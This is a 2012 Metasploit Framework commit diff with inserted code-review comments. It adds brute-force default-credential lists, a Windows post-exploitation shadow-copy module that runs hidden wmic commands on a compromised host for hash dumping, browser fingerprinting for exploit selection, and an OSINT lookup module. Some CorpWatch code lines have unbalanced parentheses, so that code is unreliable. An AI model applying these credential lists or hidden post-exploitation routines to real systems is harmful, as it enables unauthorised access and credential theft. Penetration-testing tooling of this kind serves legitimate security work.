Merge branch 'master' of r7.github.com:rapid7/metasploit-framework

unstable
Jonathan Cran 2012-01-05 18:26:26 -06:00
commit bedc34ad44
60 changed files with 2294 additions and 100 deletions

Binary file not shown.


@ -1,6 +1,74 @@
Armitage Changelog
==================
5 Jan 12
--------
- Armitage d-server now transmits hosts, service, and session state only
when something has changed. This makes teaming much snappier.
- Uploading an imported hosts file now shows a progress dialog.
- File browser upload function no longer blocks the user interface in team
mode. A progress dialog is shown for uploading larger files.
- Removed Ctrl+R refresh hosts shortcut from graph view (it's no longer
necessary)
- Armitage now exits if it was unable to connect to the collaboration server.
- Hosts -> NMap Scans and Hosts -> MSF Scans dialogs are now populated with
the selected values from the target area by default.
- You may now interact with a Windows command shell through Java meterpreter.
- Armitage no longer shows Webcam Shot option through Java meterpreter.
- Armitage now detects when it does not have read permissions for the database
YAML file and prompts with something helpful. Before it would just freeze
with a blank dialog. Not helpful. :)
- Armitage now only shows services that are open.
- View -> Reporting -> Export Data now has the capability of dumping the whole
database (not just the current workspace).
- Added a dialog to View -> Reporting Export Data. Now you have the ability to
dump all hosts or choose to dump one of the dynamic workspaces. This gives
you a lot of flexibility with which hosts are included.
- Cleaned up exported output of vulnerabilities in the Metasploit database:
-- duplicate entries are collapsed to one (this was the fault of my query)
-- refs column contains references separated by a comma and a space
-- added info and module columns. The module column indicates the appropriate
Metasploit module
-- Metasploit modules now populate name, info, and module in an appropriate
way.
- Values exported to TSV are cleaned up such that newlines are replaced with a
literal \n and tabs are converted to three spaces.
30 Dec 11 - last release of the year?
---------
- Hosts -> Clear Database now clears the sessions and clients tables
- Fixed a bug preventing dynamic workspace port/session filter from
working on a fresh database. This was a fun one. This only affected
folks with a completely fresh database and because Hosts -> Clear
Database didn't clear everything, this went unnoticed until now.
- Added various reverse shell payloads to payload helper dialog.
- Added file chooser helper for SigningCert and SigningKey options.
- Added hack to return correct route info when setting up pivoting through
Java meterpreter.
- Armitage now posts a note to the event log when a user starts a browser
exploit or a server module.
- Armitage now supports dragging and dropping a module onto a host in graph
and table view. This action opens the module launcher configured to work
with that host.
- Drastically rewrote MSF Scans. MSF Scans now intelligently builds a list
of ports to scan based on what Metasploit can do. After an initial port
scan, MSF Scans runs discovery modules against relevant hosts. As a bonus
you will see all of the output of these scans.
- Enhanced the Windows heuristic used to guess which OS image to display
- The deconfliction server throttle is now less draconian about how long it
throttles a call.
- Armitage no longer posts to the event log from the UI thread (this will
prevent the UI from blocking in some cases)
- Command shell now handles interaction with d-server in a separate thread
from the UI thread. This will prevent UI blocking in some cases.
- Added Ping Sweep... option for non-Windows meterpreter sessions. Now Java
meterpreter users have a quick host discovery option.
- Change Host OS option now matches new Metasploit database schema.
- Deconfliction server now sets LHOST to the IP address you provided. Also,
Armitage clients do not overwrite LHOST once it is set.
- Interacting with a shell in team mode no longer blocks UI to communicate
with d-server.
12 Dec 11
---------
- Armitage teaming mode now downloads the resulting file for any fileformat


@ -12,3 +12,6 @@ user
system
sys
none
xampp
wampp
ppmax2011


@ -4,3 +4,6 @@ admin 1234
cisco cisco
cisco sanfran
private private
wampp xampp
newuser wampp
xampp-dav-unsecure ppmax2011


@ -8,3 +8,6 @@ security
user
system
sys
wampp
newuser
xampp-dav-unsecure


@ -47,3 +47,4 @@ root letmein
root powerapp
root dbps
root ibm
root monitor


@ -19,7 +19,6 @@ module Auxiliary::Report
end
def myworkspace
return @myworkspace if @myworkspace
@myworkspace = framework.db.find_workspace(self.workspace)
end


@ -492,11 +492,15 @@ module Exploit::Remote::HttpClient
end
].compact
headers ={ 'Authorization' => auth.join(', ') }
headers.merge!(opts['headers']) if opts['headers']
# Send main request with authentication
r = c.request_cgi(opts.merge({
'uri' => path,
'method' => method,
'headers' => { 'Authorization' => auth.join(', ') }}))
'headers' => headers }))
resp = c.send_recv(r, to)
unless resp.kind_of? Rex::Proto::Http::Response
return [nil,nil]
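Review bot: the merge order on the `headers.merge!(opts['headers']) if opts['headers']` line lets a caller-supplied 'Authorization' header silently replace the digest header just built from `auth`, because `merge!` takes the argument's value on a key conflict. If caller headers are meant to supplement the authentication rather than override it, merge the other way round, e.g. `headers = (opts['headers'] || {}).merge('Authorization' => auth.join(', '))`; if overriding is intended, a one-line comment saying so would spare the next reader the question. The later `'headers' => headers` entry inside `opts.merge({...})` does correctly win over the raw `opts['headers']`, so the rest of the request construction is consistent.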


@ -0,0 +1,203 @@
require 'msf/core/post/windows/services'
module Msf
class Post
module Windows
# Based on the research from Tim Tomes and Mark Baggett, at
# http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
module ShadowCopy
include Msf::Post::Windows::WindowsServices
def get_vss_device(id)
result = get_sc_param(id,'DeviceObject')
end
def vss_list
ids = vss_get_ids
shadow_copies = []
ids.each do |id|
print_status "Getting data for Shadow Copy #{id} (This may take a minute)"
shadow_copies << get_sc_details("\"#{id}\"")
end
return shadow_copies
end
def vss_get_ids
result = wmicexec('shadowcopy get id')
ids = result.scan(/\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}/)
return ids
end
def vss_get_storage
storage={}
storage['AllocatedSpace'] = vss_get_storage_param('AllocatedSpace')
storage['MaxSpace'] = vss_get_storage_param('MaxSpace')
storage['UsedSpace'] = vss_get_storage_param('UsedSpace')
return storage
end
def get_sc_details(id)
shadowcopy={}
shadowcopy['ID'] = id
shadowcopy['ClientAccessible'] = get_sc_param(id,'ClientAccessible')
shadowcopy['Count'] = get_sc_param(id,'Count')
shadowcopy['DeviceObject'] = get_sc_param(id,'DeviceObject')
shadowcopy['Differential'] = get_sc_param(id,'Differential')
shadowcopy['ExposedLocally'] = get_sc_param(id,'ExposedLocally')
shadowcopy['ExposedName'] = get_sc_param(id,'ExposedName')
shadowcopy['ExposedRemotely'] = get_sc_param(id,'ExposedRemotely')
shadowcopy['HardwareAssisted'] = get_sc_param(id,'HardwareAssisted')
shadowcopy['Imported'] = get_sc_param(id,'Imported')
shadowcopy['NoAutoRelease'] = get_sc_param(id,'NoAutoRelease')
shadowcopy['NotSurfaced'] = get_sc_param(id,'Notsurfaced')
shadowcopy['NoWriters'] = get_sc_param(id,'NoWriters')
shadowcopy['OriginiatingMachine'] = get_sc_param(id,'OriginatingMachine')
shadowcopy['Persistent'] = get_sc_param(id,'Persistent')
shadowcopy['Plex'] = get_sc_param(id,'Plex')
shadowcopy['ProviderID'] = get_sc_param(id,'ProviderID')
shadowcopy['ServiceMachine'] = get_sc_param(id,'ServiceMachine')
shadowcopy['SetID'] = get_sc_param(id,'SetID')
shadowcopy['State'] = get_sc_param(id,'State')
shadowcopy['Transportable'] = get_sc_param(id,'Transportable')
shadowcopy['VolumeName'] = get_sc_param(id,'VolumeName')
return shadowcopy
end
def get_sc_param(id,param_name)
result = wmicexec("shadowcopy where(id=#{id}) get #{param_name}")
result.gsub!(param_name,'')
result.gsub!(/\s/,'')
end
def vss_get_storage_param(param_name)
result = wmicexec("shadowstorage get #{param_name}")
result.gsub!(param_name,'')
result.gsub!(/\s/,'')
end
def vss_set_storage(bytes)
result = wmicexec("shadowstorage set MaxSpace=\"#{bytes}\"")
if result.include?("success")
return true
else
return false
end
end
def create_shadowcopy(volume)
result = wmicexec("shadowcopy call create \"ClientAccessible\", \"#{volume}\"")
retval = result.match(/ReturnValue = (\d)/)
case retval[1].to_i
when 0
print_status("ShadowCopy created successfully")
sc_id = result.match(/ShadowID = ("\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}")/)
return sc_id[1]
when 1
print_error("Access Denied")
when 2
print_error("Invalid Argument")
when 3
print_error("Specified volume not found")
when 4
print_error("Specified volume not supported")
when 5
print_error("Unsupported shadow copy context")
when 6
print_error("Insufficient Storage")
when 7
print_error("Volume is in use")
when 8
print_error("Maximum number of shadow copies reached")
when 9
print_error("Another shadow copy operation is already in progress")
when 10
print_error("Shadow copy provider vetoed the operation")
when 11
print_error("Shadow copy provider not registered")
when 12
print_error("Shadow copy provider failure")
else
print_error("Unknown error")
end
return nil
end
def start_vss
vss_state = wmicexec('Service where(name="VSS") get state')
if vss_state=~ /Running/
print_status("Volume Shadow Copy service is running.")
else
print_status("Volume Shadow Copy service not running. Starting it now...")
begin
ss_result = service_start("VSS")
case ss_result
when 0
print_status("Volume Shadow Copy started successfully.")
when 1
print_error("Volume Shadow Copy already running.")
when 2
print_error("Volume Shadow Copy is disabled.")
print_status("Attempting to re-enable...")
service_change_startup("VSS","manual")
ss_result = service_start("VSS")
if ss_result == 0
return true
else
return false
end
end
rescue
print_error("Insufficient Privs to start service!")
return false
end
end
return true
end
def wmicexec(wmiccmd)
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
rescue ::Exception => e
print_error("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout.gsub!(/[^[:print:]]/,'') #scrub out garbage
return tmpout
end
end
end
end
end
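Review bot: `create_shadowcopy` matches the WMI return code with `/ReturnValue = (\d)/`, a single digit, so the codes 10, 11 and 12 that the case statement lists are parsed as 1 and reported as "Access Denied"; use `(\d+)`, and check `retval` for nil before indexing it, because a wmic run that prints no ReturnValue currently raises NoMethodError instead of a clean error. In `get_sc_param` and `vss_get_storage_param` the method value is the result of the trailing `result.gsub!(/\s/,'')`, and `gsub!` returns nil when nothing was substituted, so callers can receive nil for a perfectly good value; return `result` explicitly or use non-bang `gsub`. Two name mismatches in `get_sc_details`: `'Notsurfaced'` is passed as the property to strip from the output while wmic prints the column header in its schema case, `NotSurfaced`, so the case-sensitive `gsub!(param_name,'')` leaves the header in the returned value (a case-insensitive strip would be safer for every property); and the hash key `'OriginiatingMachine'` is misspelled, so consumers looking up `OriginatingMachine` get nil. Minor: `get_vss_device` assigns `result` and never uses it.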


@ -71,7 +71,7 @@ class Client
resp = MessagePack.unpack(res.body)
if resp and resp.kind_of?(::Hash) and resp['error'] == true
raise Msf::RPC::ServerException.new(res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
raise Msf::RPC::ServerException.new(resp['error_code'] || res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
end
return resp


@ -88,6 +88,9 @@ class Core
"kill" => "Kill a job",
"load" => "Load a framework plugin",
"loadpath" => "Searches for and loads modules from a path",
"popm" => "Pops the latest module off of the module stack and makes it active",
"pushm" => "Pushes the active or list of modules onto the module stack",
"previous" => "Sets the previously loaded module as the current module",
"quit" => "Exit the console",
"resource" => "Run the commands stored in a file",
"makerc" => "Save commands entered since start to a file",
@ -118,6 +121,8 @@ class Core
@dscache = {}
@cache_payloads = nil
@previous_module = nil
@module_name_stack = []
end
#
@ -2127,8 +2132,9 @@ class Core
return false
end
# If there's currently an active module, go back
# If there's currently an active module, enqueque it and go back
if (active_module)
@previous_module = active_module
cmd_back()
end
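Review bot: typo in the rewritten comment `# If there's currently an active module, enqueque it and go back`: "enqueque" should be "enqueue". The logic itself is fine; `@previous_module` holds the module instance and `cmd_previous` only reads its `fullname`.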
@ -2153,6 +2159,94 @@ class Core
driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
end
#
# Command to take to the previously active module
#
def cmd_previous()
if @previous_module
self.cmd_use(@previous_module.fullname)
else
print_error("There isn't a previous module at the moment")
end
end
#
# Help for the 'previous' command
#
def cmd_previous_help
print_line "Usage: previous"
print_line
print_line "Set the previously loaded module as the current module"
print_line
end
#
# Command to enqueque a module on the module stack
#
def cmd_pushm(*args)
# could check if each argument is a valid module, but for now let them hang themselves
if args.count > 0
args.each do |arg|
@module_name_stack.push(arg)
# Note new modules are appended to the array and are only module (full)names
end
else #then just push the active module
if active_module
#print_status "Pushing the active module"
@module_name_stack.push(active_module.fullname)
else
print_error("There isn't an active module and you didn't specify a module to push")
return self.cmd_pushm_help
end
end
end
#
# Help for the 'pushm' command
#
def cmd_pushm_help
print_line "Usage: pushm [module1 [,module2, module3...]]"
print_line
print_line "push current active module or specified modules onto the module stack"
print_line
end
#
# Command to dequeque a module from the module stack
#
def cmd_popm(*args)
if (args.count > 1 or not args[0].respond_to?("to_i"))
return self.cmd_popm_help
elsif args.count == 1
# then pop 'n' items off the stack, but don't change the active module
if args[0].to_i >= @module_name_stack.count
# in case they pass in a number >= the length of @module_name_stack
@module_name_stack = []
print_status("The module stack is empty")
else
@module_name_stack.pop[args[0]]
end
else #then just pop the array and make that the active module
pop = @module_name_stack.pop
if pop
return self.cmd_use(pop)
else
print_error("There isn't anything to pop, the module stack is empty")
end
end
end
#
# Help for the 'popm' command
#
def cmd_popm_help
print_line "Usage: popm [n]"
print_line
print_line "pop the latest module off of the module stack and make it the active module"
print_line "or pop n modules off the stack, but don't change the active module"
print_line
end
#
# Tab completion for the use command
#

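Review bot: `cmd_popm` does not pop n entries as its help text promises. On the `@module_name_stack.pop[args[0]]` line, `pop` is called without an argument, so it removes a single element (the top name, a String), and `[args[0]]` then merely indexes that string with the user's argument; `popm 3` therefore discards exactly one entry. The intended call is `@module_name_stack.pop(args[0].to_i)`. The guard on the `if (args.count > 1 or not args[0].respond_to?("to_i"))` line also accepts any String, since String responds to `to_i`, so `popm foo` is treated as `popm 0` rather than falling through to the help; matching the argument against `/\A\d+\z/` would be stricter. Comment typos: "enqueque" and "dequeque" should be "enqueue" and "dequeue".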

@ -948,6 +948,27 @@ class Db
end
end
end
# Handle hostless loot
if host_ranges.compact.empty? # Wasn't a host search
hostless_loot = framework.db.loots.find_all_by_host_id(nil)
hostless_loot.each do |loot|
row = []
row.push("")
row.push("")
row.push(loot.ltype)
row.push(loot.name || "")
row.push(loot.content_type)
row.push(loot.info || "")
row.push(loot.path)
tbl << row
if (mode == :delete)
loot.destroy
delete_count += 1
end
end
end
print_line
print_line tbl.to_s
print_status "Deleted #{delete_count} loots" if delete_count > 0
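Review bot: in the `if (mode == :delete)` branch, `loot.destroy` removes only the database record; the file referenced by `loot.path` stays on disk, so if the delete mode is meant to purge loot the path should be unlinked as well (and a failure to unlink reported). The two leading `row.push("")` calls pad the host and address columns for hostless entries, which matches the table layout, but a short comment there would make that dependency explicit.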


@ -249,11 +249,11 @@ module Net; module SSH; module Service
'PeerHost' => remote.host,
'PeerPort' => remote.port,
'Context' => {
'Msf' => options[:msframework],
'MsfExploit' => options[:msfmodule]
'Msf' => session.options[:msframework],
'MsfExploit' => session.options[:msfmodule]
}
)
options[:msfmodule].add_socket(client) if options[:msfmodule]
session.options[:msfmodule].add_socket(client) if session.options[:msfmodule]
info { "connected #{connected_address}:#{connected_port} originator #{originator_address}:#{originator_port}" }


@ -6,7 +6,7 @@ require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
#
#
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
@ -26,7 +26,7 @@ module Exploitation
# ua_ver_eq(a, b): returns true if a == b
#
class JavascriptOSDetect < JSObfu
def initialize(custom_js = '', opts = {})
clients = ::Msf::HttpClients
oses = ::Msf::OperatingSystems
@ -37,7 +37,7 @@ class JavascriptOSDetect < JSObfu
* presence of a spoofed User-Agent. OS detection is more fragile and
* requires truthful navigator.appVersion and navigator.userAgent strings in
* order to be accurate for more than just IE on Windows.
**/
**/
function getVersion(){
//Default values:
var os_name;
@ -66,7 +66,7 @@ function getVersion(){
ua_version = opera.version();
if (!os_name) {
// The 'inconspicuous' argument is there to give us a real value on
// Opera 6 where, without it, the return value is supposedly
// Opera 6 where, without it, the return value is supposedly
// 'Hm, were you only as smart as Bjorn Vermo...'
// though I have not verfied this claim.
switch (opera.buildNumber('inconspicuous')) {
@ -154,7 +154,7 @@ function getVersion(){
// implement window.getComputedStyle now. For some reason, checking for
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
// isn't IE first.
//
//
// Then this is a Gecko derivative, assume Firefox since that's the
// only one we have sploits for. We may need to revisit this in the
// future. This works for multi/browser/mozilla_compareto against
@ -189,7 +189,7 @@ function getVersion(){
arch = "#{ARCH_X86_64}";
}
if (version.match(/Windows/)) {
os_name = "#{oses::WINDOWS}";
os_name = "#{oses::WINDOWS}";
switch(version) {
case "Windows NT 5.0": os_flavor = "2000"; break;
case "Windows NT 5.1": os_flavor = "XP"; break;
@ -594,7 +594,7 @@ function getVersion(){
// IE 6.0.2600.0000, XP SP0 English
// IE 6.0.2800.1106, XP SP1 English
ua_version = "6.0";
os_flavor = "XP";
os_flavor = "XP";
os_sp = "SP0";
break;
case "568515":
@ -698,7 +698,7 @@ function getVersion(){
// but not IE8, regardless of mode
ua_version = "7.0";
}
} else if (document.compatMode) {
} else if (document.compatMode) {
ua_version = "6.0";
} else if (window.createPopup) {
ua_version = "5.5";
@ -726,7 +726,7 @@ function getVersion(){
// Then this is Gecko and we can get at least os_name without the
// useragent
version = navigator.oscpu.toLowerCase();
} else {
} else {
// All we have left is the useragent and we know it's lying, so don't bother
version = " ";
}
@ -756,9 +756,9 @@ function getVersion(){
else if (version.indexOf("fedora") != -1) { os_flavor = "Fedora"; }
else if (version.indexOf("android") != -1) { os_flavor = "Android"; }
}
//--
// Language
// Language
//--
if (navigator.systemLanguage) {
// ie
@ -768,12 +768,12 @@ function getVersion(){
os_lang = navigator.language;
} else {
// some other browser and we don't know how to get the language, so
// just guess english
// just guess english
os_lang = "en";
}
//--
// Architecture
// Architecture
//--
if (typeof(navigator.cpuClass) != 'undefined') {
// Then this is IE or Opera9+ and we can grab the arch directly
@ -791,7 +791,7 @@ function getVersion(){
// platform
version = navigator.platform;
//document.write(version + "\\n");
// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
// 64-bit client on Windows 7, 64-bit:
// Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
// 32-bit client on Windows 7, 64-bit:
@ -817,10 +817,10 @@ function searchVersion(needle, haystack) {
var found_version;
if (index == -1) { return; }
found_version = haystack.substring(index+needle.length+1);
if (found_version.indexOf(' ') != -1) {
if (found_version.indexOf(' ') != -1) {
// Strip off any junk at the end such as a CLR declaration
found_version = found_version.substring(0,found_version.indexOf(' '));
}
}
return found_version;
}
@ -849,7 +849,7 @@ function ua_ver_cmp(ver_a, ver_b) {
b_rest = b[i].substr(b_int.toString().length);
if (a_int < b_int) {
return -1;
} else if (a_int > b_int) {
} else if (a_int > b_int) {
return 1;
} else { // ==
// Then we need to deal with the stuff after the ints, e.g.:
@ -863,7 +863,7 @@ function ua_ver_cmp(ver_a, ver_b) {
// Just give up and try a lexicographical comparison
if (a_rest < b_rest) {
return -1;
} else if (a_rest > b_rest) {
} else if (a_rest > b_rest) {
return 1;
}
}


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '31531' ],
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
],
'Author' => [ 'Anshul Pandey <anshul999@gmail.com>', 'patrick' ],
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'patrick' ],
'License' => MSF_LICENSE
)


@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' =>
[
'sid', # Original POC
'TheLightCosine <thelightcosine@gmail.com>' # msf module
'TheLightCosine <thelightcosine[at]gmail.com>' # msf module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',


@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
ChangeCipherspec Datagram before a ClientHello.
},
'Author' => [
'Jon Oberheide <jon@oberheide.org>', #original code
'TheLightCosine <thelightcosine@gmail.com>' # metasploit module
'Jon Oberheide <jon[at]oberheide.org>', #original code
'TheLightCosine <thelightcosine[at]gmail.com>' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',


@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
Enterprise Business Suite service.
},
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
'Author' => [ 'guiness.stout <guinness.stout[at]gmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>


@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
without SP1 does not seem affected by this flaw.
},
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>


@ -0,0 +1,535 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company ID Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
register_options(
[
OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
OptString.new('YEAR', [ false, "Year to look up", ""]),
OptBool.new('GET_LOCATIONS', [ false, "Get locations for company", true]),
OptBool.new('GET_NAMES', [ false, "Get all registered names ofr the company", true]),
OptBool.new('GET_FILINGS', [ false, "Get all filings", false ]),
OptBool.new('GET_CHILDREN', [false, "Get children companies", true]),
OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
OptBool.new('GET_HISTORY', [false, "Get company history", false])
], self.class)
deregister_options('RHOST', 'RPORT', 'VHOST', 'Proxies')
end
def cleanup
datastore['RHOST'] = @old_rhost
datastore['RPORT'] = @old_rport
end
def run
# Save the original rhost/rport in case the user was exploiting something else
@old_rhost = datastore['RHOST']
@old_rport = datastore['RPORT']
# Initial api.corpwatch.org's rhost and rport for HttpClient
datastore['RHOST'] = 'api.corpwatch.org'
datastore['RPORT'] = 80
loot = ""
uri = "/"
uri << (datastore['YEAR']) if datastore['YEAR'] != ""
uri << ("/companies/" + datastore['CW_ID'])
res = send_request_cgi({
'uri' => uri + ".xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("No response from server.")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Malformed XML or broken response")
return
end
root = doc.root
if doc.root == nil
print_error("No document root, no results returned")
return
end
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("No results returned")
return
end
results = elements[0]
if results == nil
print_error("No results returned")
return
end
elements = results.get_elements("companies")
if elements == nil || elements.length == 0
print_error("No companies returned")
return
end
results = elements[0]
if results == nil || results.elements == nil
print_error("No results returned")
return
end
results.elements.each { |e|
loot << ("CorpWatchID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCentral Index Key " + (cik = grab_text(e, "cik")))
loot << ("\nName: " + (name = grab_text(e, "company_name")))
loot << ("\nIRS Number: " + (irsno = grab_text(e, "irs_number")))
loot << ("\nSIC Code: " + (sic_code = grab_text(e, "sic_code")))
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + ( country = grab_text(e, "country_code")))
loot << ("\nSub-Division: " + (subdiv = grab_text(e, "subdiv_code")))
loot << ("\nTop Parent CW_ID: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMinimum searchable year: "+ (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_status("Basic Information\n--------------------")
print_status("CorpWatch ID: " + cwid)
print_status("Central Index Key (CIK): " + cik)
print_status("Full Name: " + name)
print_status("IRS Number: " + irsno)
print_status("SIC Code: " + sic_code)
print_status("Sector: " + sector)
print_status("Source Type: " + source)
print_line("")
print_status("Address and Location Information\n-----------------------------")
print_status("Full Address: " + address)
print_status("Country Code: " + country)
print_status("Subdivision: " + subdiv)
print_line("")
print_status("Parent and Children Information\n---------------------------")
print_status("Top Parent ID: " + top_parent)
print_status("Number of parent companies: " + num_parents)
print_status("Number of child companies: " + num_children)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
if datastore['GET_LOCATIONS']
res = send_request_cgi(
{
'uri' => uri + "/locations.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error ("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query returned bad or poorly formatted data.")
return
end
root = doc.root
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("no results returned")
return
end
results = elements[0]
if results == nil
print_status("No results returned")
else
results = results.get_elements("locations")[0]
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))
loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nType: " + (type = grab_text(e, "type")))
loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
loot << ("\nStreet 1: " + (street1 = grab_text(e, "street_1")))
loot << ("\nStreet 2: " + (street2 = grab_text(e, "street_2")))
loot << ("\nCity: " + (city = grab_text(e, "city")))
loot << ("\nState: " + (state = grab_text(e, "state")))
loot << ("\nZIP: " + (zip = grab_text(e, "postal_code")))
loot << ("\nDate valid: " + (date_valid = grab_text(e, "date")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_line("")
print_status("Detailed Location Information\n----------------------------------")
print_status("Country Code: " + country_code)
print_status("Subdivision: " + subdiv_code)
print_status("Residential/Business address: " + type)
print_status("Full Address: " + full_address)
print_status("Street 1: " + street1)
print_status("Street 2: " + street2)
print_status("City: " + city)
print_status("State:" + state)
print_status("Postal Code: " + zip)
print_status("Date address was valid: " + date_valid)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
if datastore['GET_NAMES']
res = send_request_cgi(
{
'uri' => uri + "/names.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or bad response")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query returned bad or poorly formatted XML")
return
end
root = doc.root
if root == nil
print_error("document root nil")
return
end
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("Returned no or broken results")
return
end
results = elements[0]
if results == nil
print_status("No results returned")
else
results = results.get_elements("names")[0]
results.elements.each { |e|
loot << ("Name: " + (name = grab_text(e, "company_name")))
loot << ("\nSource: " + (source = grab_text(e, "source")))
loot << ("\nDate: " + (date = grab_text(e, "date")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMin searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_line("\n")
print_status("Detailed Name Information\n---------------------------")
print_status("Name: " + name)
print_status("Source: " + source)
print_status("Date valid: " + date)
print_status("Max lookup year: " + max_year)
print_status("Min lookup year: " + min_year)
}
end
end
if datastore['GET_FILINGS']
res = send_request_cgi(
{
'uri' => uri + "/filings.xml",
'method' => 'GET'
}, 25)
if res == nil
print_error("Server down or response broken")
return
end
begin
doc = REXML::Document.new(res.body)
rescue
print_error("Query return bad or broken data")
return
end
root = doc.root
elements = root.get_elements("result")
if elements == nil || elements.length == 0
print_error("Results were either broken or not returned")
return
end
results = elements[0]
if results == nil
print_status("No results returned")
else
elements = results.get_elements("filings")
if elements == nil
print_error("Results broken or not returned")
return
end
results = elements[0]
if results == nil
print_status("No filings found")
else
results.elements.each { |e|
loot << ("Central Index Key: " + (cik = grab_text(e, "cik")))
loot << ("\nYear filed: " + (year_filed = grab_text(e, "year")))
loot << ("\nQuarter filed: " + (quarter_filed = grab_text(e, "quarter")))
loot << ("\nReport period: " + (report_period = grab_text(e, "period_of_report")))
loot << ("\nFiling date: " + (filing_date = grab_text(e, "filing_date")))
loot << ("\nForm 10k: " + (form10k = grab_text(e, "form_10K_url")))
loot << ("\nSEC21: " + (sec21 = grab_text(e, "sec_21_url")))
loot << ("\nIs a filer: " + (is_filer = grab_text(e, "company_is_filer")))
loot << "\n\n\n"
print_line("\n")
print_status("Detailed Filing Information\n---------------------")
print_status("Central Index Key: " + cik)
print_status("Year filed: " + year_filed)
print_status("Quarter Filed: " + quarter_filed)
print_status("Report Period: " + report_period)
print_status("Filing Date: " + filing_date)
print_status("10K Filing Form: " + form10k)
print_status("SEC 21 Form: " + sec21)
print_status("Company is active filer: " + (is_filer == "1" ? "true" : "false"))
}
end
end
end
if datastore['GET_CHILDREN']
child_uri = (uri + "/children.xml")
if datastore['CHILD_LIMIT'] != nil
child_uri << "?limit=#{datastore['CHILD_LIMIT']}"
